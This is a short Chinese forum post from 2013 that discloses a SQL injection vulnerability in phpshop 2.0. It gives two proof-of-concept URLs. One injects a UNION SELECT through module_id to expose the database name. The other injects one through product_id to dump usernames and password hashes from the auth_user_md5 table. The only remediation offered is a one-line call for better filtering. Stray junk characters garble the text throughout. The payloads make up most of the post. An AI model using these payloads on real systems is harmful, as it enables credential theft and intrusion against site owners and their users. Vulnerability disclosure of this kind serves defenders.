标题 : phpshop 2.0 SQL Injection Vulnerability# V' X5 u9 n- G
% y3 _, R; d/ r. S3 A' W/ y作者 : By onestree
& G; m7 n, U+ v) K" t# u! |; N下载地址 : http://code.google.com/p/phpshop/downloads/list* U4 [, U) H3 w/ W8 T2 a: h* }! z, j
测试地址: windows 7 / ubuntu* P% D: w6 ]8 R1 n- \$ V
( j4 H e# F: V$ Q6 F) F/ n
6 I, h7 c: g0 A, G0 A8 JSQLi p0c:4 t0 K- D. U0 X
8 Z5 n& K: N, }6 _; Y! v& F0 X
==================' G$ M P; v- O9 |9 F6 R, q
4 I2 _0 a/ B* G; }6 vhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 T, z7 c' g- }2 Y4 a
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --$ B! ], l# @- L. d
. `- ]1 j, o6 y, g5 s, C2 ~
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--. d$ c: i8 Y/ s$ A
( S& j; I# G3 J# N' c P2 Q修复:
9 h4 s$ K) [3 y+ o4 p加强过滤
U8 {' O. G) T8 r3 t! s$ ?: \& |/ ]8 w `
i4 K) S5 O8 x. p5 c; ~ |
发表于 2013-1-18 18:24:10
收藏
支持
反对